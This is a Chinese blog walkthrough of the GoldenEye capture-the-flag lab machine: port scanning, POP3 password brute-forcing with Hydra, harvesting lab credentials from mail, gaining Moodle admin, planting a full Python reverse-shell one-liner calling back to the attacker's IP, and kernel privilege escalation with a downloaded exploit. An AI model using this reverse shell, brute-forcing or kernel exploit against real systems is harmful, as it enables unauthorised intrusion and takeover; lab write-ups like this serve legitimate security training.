天道酬勤

GoldenEye-WALKTHROUGH

一、主机发现

使用netdiscover进行发现,IP为192.168.203.151

二、端口扫描

root@kali:~# nmap -sS -A 192.168.203.151 --script=vuln
Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-02 01:47 EST
Pre-scan script results:
| broadcast-avahi-dos: 
|   Discovered hosts:
|     224.0.0.251
|   After NULL UDP avahi packet DoS (CVE-2011-1002).
|_  Hosts are all up (not vulnerable).
Nmap scan report for 192.168.203.151
Host is up (0.00045s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
25/tcp open  smtp    Postfix smtpd
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
| smtp-vuln-cve2010-4344: 
|_  The SMTP server is not Exim: NOT VULNERABLE
| ssl-dh-params: 
|   VULNERABLE:
|   Anonymous Diffie-Hellman Key Exchange MitM Vulnerability
|     State: VULNERABLE
|       Transport Layer Security (TLS) services that use anonymous
|       Diffie-Hellman key exchange only provide protection against passive
|       eavesdropping, and are vulnerable to active man-in-the-middle attacks
|       which could completely compromise the confidentiality and integrity
|       of any data exchanged over the resulting session.
|     Check results:
|       ANONYMOUS DH GROUP 1
|             Cipher Suite: TLS_DH_anon_WITH_AES_128_CBC_SHA
|             Modulus Type: Safe prime
|             Modulus Source: postfix builtin
|             Modulus Length: 1024
|             Generator Length: 8
|             Public Key Length: 1024
|     References:
|       https://www.ietf.org/rfc/rfc2246.txt
|   
|   Transport Layer Security (TLS) Protocol DHE_EXPORT Ciphers Downgrade MitM (Logjam)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2015-4000  BID:74733
|       The Transport Layer Security (TLS) protocol contains a flaw that is
|       triggered when handling Diffie-Hellman key exchanges defined with
|       the DHE_EXPORT cipher. This may allow a man-in-the-middle attacker
|       to downgrade the security of a TLS session to 512-bit export-grade
|       cryptography, which is significantly weaker, allowing the attacker
|       to more easily break the encryption and monitor or tamper with
|       the encrypted stream.
|     Disclosure date: 2015-5-19
|     Check results:
|       EXPORT-GRADE DH GROUP 1
|             Cipher Suite: TLS_DHE_RSA_EXPORT_WITH_DES40_CBC_SHA
|             Modulus Type: Safe prime
|             Modulus Source: Unknown/Custom-generated
|             Modulus Length: 512
|             Generator Length: 8
|             Public Key Length: 512
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4000
|       https://weakdh.org
|       https://www.securityfocus.com/bid/74733
|   
|   Diffie-Hellman Key Exchange Insufficient Group Strength
|     State: VULNERABLE
|       Transport Layer Security (TLS) services that use Diffie-Hellman groups
|       of insufficient strength, especially those using one of a few commonly
|       shared groups, may be susceptible to passive eavesdropping attacks.
|     Check results:
|       WEAK DH GROUP 1
|             Cipher Suite: TLS_DHE_RSA_WITH_DES_CBC_SHA
|             Modulus Type: Safe prime
|             Modulus Source: postfix builtin
|             Modulus Length: 1024
|             Generator Length: 8
|             Public Key Length: 1024
|     References:
|_      https://weakdh.org
| ssl-poodle: 
|   VULNERABLE:
|   SSL POODLE information leak
|     State: VULNERABLE
|     IDs:  CVE:CVE-2014-3566  BID:70574
|           The SSL protocol 3.0, as used in OpenSSL through 1.0.1i and other
|           products, uses nondeterministic CBC padding, which makes it easier
|           for man-in-the-middle attackers to obtain cleartext data via a
|           padding-oracle attack, aka the "POODLE" issue.
|     Disclosure date: 2014-10-14
|     Check results:
|       TLS_RSA_WITH_AES_128_CBC_SHA
|     References:
|       https://www.openssl.org/~bodo/ssl-poodle.pdf
|       https://www.securityfocus.com/bid/70574
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3566
|_      https://www.imperialviolet.org/2014/10/14/poodle.html
|_sslv2-drown: 
80/tcp open  http    Apache httpd 2.4.7 ((Ubuntu))
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| vulners: 
|   cpe:/a:apache:http_server:2.4.7: 
|       CVE-2017-7679   7.5     https://vulners.com/cve/CVE-2017-7679
|       CVE-2018-1312   6.8     https://vulners.com/cve/CVE-2018-1312
|       CVE-2017-15715  6.8     https://vulners.com/cve/CVE-2017-15715
|       CVE-2014-0226   6.8     https://vulners.com/cve/CVE-2014-0226
|       CVE-2017-9788   6.4     https://vulners.com/cve/CVE-2017-9788
|       CVE-2019-0217   6.0     https://vulners.com/cve/CVE-2019-0217
|       CVE-2019-10098  5.8     https://vulners.com/cve/CVE-2019-10098
|       CVE-2019-0220   5.0     https://vulners.com/cve/CVE-2019-0220
|       CVE-2018-17199  5.0     https://vulners.com/cve/CVE-2018-17199
|       CVE-2017-9798   5.0     https://vulners.com/cve/CVE-2017-9798
|       CVE-2017-15710  5.0     https://vulners.com/cve/CVE-2017-15710
|       CVE-2016-8743   5.0     https://vulners.com/cve/CVE-2016-8743
|       CVE-2016-2161   5.0     https://vulners.com/cve/CVE-2016-2161
|       CVE-2016-0736   5.0     https://vulners.com/cve/CVE-2016-0736
|       CVE-2014-3523   5.0     https://vulners.com/cve/CVE-2014-3523
|       CVE-2014-0231   5.0     https://vulners.com/cve/CVE-2014-0231
|       CVE-2019-10092  4.3     https://vulners.com/cve/CVE-2019-10092
|       CVE-2016-4975   4.3     https://vulners.com/cve/CVE-2016-4975
|       CVE-2015-3185   4.3     https://vulners.com/cve/CVE-2015-3185
|       CVE-2014-8109   4.3     https://vulners.com/cve/CVE-2014-8109
|       CVE-2014-0118   4.3     https://vulners.com/cve/CVE-2014-0118
|       CVE-2014-0117   4.3     https://vulners.com/cve/CVE-2014-0117
|       CVE-2018-1283   3.5     https://vulners.com/cve/CVE-2018-1283
|_      CVE-2016-8612   3.3     https://vulners.com/cve/CVE-2016-8612
MAC Address: 00:0C:29:BD:2F:E3 (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop

TRACEROUTE
HOP RTT     ADDRESS
1   0.45 ms 192.168.203.151

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 389.82 seconds

感觉没多少东西,就又扫了一遍全端口:

root@kali:~# nmap -sS -p1-65535 192.168.203.151
Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-02 01:54 EST
Nmap scan report for 192.168.203.151
Host is up (0.00066s latency).
Not shown: 65531 closed ports
PORT      STATE SERVICE
25/tcp    open  smtp
80/tcp    open  http
55006/tcp open  unknown
55007/tcp open  unknown
MAC Address: 00:0C:29:BD:2F:E3 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 1.96 seconds

由此,服务器共开放了25805500655007.

25端口为SMTP服务器所开放,主要用于发送邮件。

三、漏洞寻找

先访问web服务:

提示我们去/sev-home/目录下登录:

提示需要用户名密码,登录。

进行目录扫描,查找敏感信息:

未发现敏感信息。

继续查找,最终在源代码中发现线索:

得到用户名以及加密的密码:

Boris
InvincibleHack3r

该编码是实体编码,在此网站进行解密:https://c.runoob.com/front-end/691

得到密码为InvincibleHack3r

拿着账号密码去登陆,发现登陆不上,后来将Boris改为小写即可登陆成功。

GNO发送邮件?并且,POP3服务放置在非默认的高端口。

查看该页的源代码,又得到信息:

Qualified GoldenEye Network Operator Supervisors: 
Natalya
Boris

之前我们探测到了两个高端口,但是不知道哪一个是POP3服务,我们再使用Nmap探测一下:

可以看到55007端口为POP3服务:

接下来,利用hydra爆破POP3服务:

由于两个用户名一起爆破可能会产生错误的原因,我们对账号一个一个爆破。

我们得到了两个账号密码:

natalya   password: bird
boris     password: secret1!

我们使用nc连接服务:

POP3的基础命令:

user   #认证用户名
pass   #认证密码
stat   #返回邮件数、 邮件总字节数
list   #返回指定邮件的大小
retr n   #返回邮件的全部文本

依次查看三封邮件的内容:

Once Xenia gets access to the training site and becomes familiar with the GoldenEye Terminal codes we will push to our final stages….

通过这句话,可以看到Xenia是一个关键任务。

我们再登录natalya的服务看一下:

在第二封邮件的内容中得到xenia的账号密码,并要求我们修改hosts文件。severnaya-station.com/gnocertdir

接下访问域名登录,并输入xenia的账号密码:

根据网站的图标判断该CMS为moodle,于是去searchsploit查找是否存在漏洞:

查到不少,再根据Blog处的标识,判断该网站的版本:

好像并没有太贴近的exp。

再找找别的线索,便发现了自己收到的一封邮件:

我们再利用hydra爆破doak,得到密码为goat

登录doak的pop3服务:

在邮件中得到他的账号和密码,并进行登录:

username: dr_doak
password: 4England!

在doak的个人文件中发现了一个文件:

打开之后,发现一个图片路径:/dir007key/for-007.jpg

就是这张照片:

我们利用strings分析一下:

base64解密得到xWinter1995x!,这应该就是admin的密码了,拿去登录:

登录成功,可见admin账号的功能就是多啊。

四、获取shell

找到如下位置,替换其中代码,利用python反弹shell:

代码如下:

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.203.149",7777));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

编辑一个blog,点击其中的图标,即可反弹shell成功:

但是第一次没有反弹成功,看了网上大佬的操作,才知道要进行如下修改,将其修改为PSpellShell

获取shell成功:

五、提权

在获取交互shell之后,发现双重字符,我们再反弹一个shell即可:

提权使用内核提权:

我们将其在searchsploit中进行查询:

我们使用该脚本进行提权:

由于目标机器中没有gcc,所以我们可以使用cc

cc和gcc区别:https://www.cnblogs.com/xj626852095/p/3648246.html

将exp中的gcc进行修改:

修改完成之后,我们在kali开启web服务:python -m SimpleHTTPServer 8080

在目标机器上使用wget下载脚本,并使用cc编译,cc -o exp 37292.c:

最后,我们给生成的exp赋权限,执行,提权成功,得到flag!

 

 

赞(2) 打赏
未经允许不得转载:HackerGu‘s Blog » GoldenEye-WALKTHROUGH
分享到: 更多 (0)

评论 抢沙发

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址

专注黑客技术的研究

联系我们联系我们

觉得文章有用就打赏一下文章作者

微信扫一扫打赏